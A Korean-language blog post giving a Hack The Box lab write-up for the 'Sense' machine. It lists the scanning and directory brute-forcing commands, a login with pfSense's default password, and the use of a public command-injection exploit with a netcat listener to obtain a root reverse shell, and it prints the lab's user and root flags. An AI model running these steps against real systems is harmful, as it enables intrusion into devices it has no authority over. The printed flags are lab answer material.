ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [HTB] Sense Writeup
    Wargame/Hack The Box 2022. 1. 17. 17:57

     

    nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.255.245

    443 port 에 lighttpd 서비스로 웹페이지가 활성화되어있는것을 알 수 있었다.

     

    dirb, gobuster 등을 활용하여 웹페이지의 취약 포인트를 찾아보았다.

    gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.129.255.245 -x php,txt,conf -o bigList

    /system-users.txt 에서 계정정보로 추정되는 값을 확인 할 수 있었다.

    password는 디폴트 값이므로 구글링 결과 pfsense 임을 알 수 있었다.

    따라서, rohit / pfsense 로 로그인 할 수 있었고 버전 등 정보를 확인 할 수 있었다.

     

    관리자 페이지 접근에 성공했으므로 pfsense, freebsd 등 키워드로 exploit 코드를 찾았고,

    pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection(43560.py) 를 활용하기로 했다.

    searchsploit freebsd
    searchsploit pfsense
    searchsploit -m 43560

     

    nc -nvlp 1234
    python3 43560.py --rhost 10.129.255.245 --lhost 10.10.14.80 --lport 1234 --username rohit --password pfsense

    바로 루트 권한의 ReverseShell을 획득 할 수 있었고 문제를 해결했다.

     

    FLAG = 

    [user] 8721327cc232073b40d27d9c17e7348b

    [root] d08c32a5d4f8c8b10e76eb51a69f1a86

    반응형

    'Wargame > Hack The Box' 카테고리의 다른 글

    [HTB] Jerry Writeup  (0) 2022.01.22
    [HTB] Arctic Writeup  (0) 2022.01.19
    [HTB] Beep Writeup  (0) 2022.01.16
    [HTB] Granny Writeup  (0) 2022.01.13
    [HTB] Optimum Writeup  (0) 2022.01.11

    댓글

Designed by Tistory.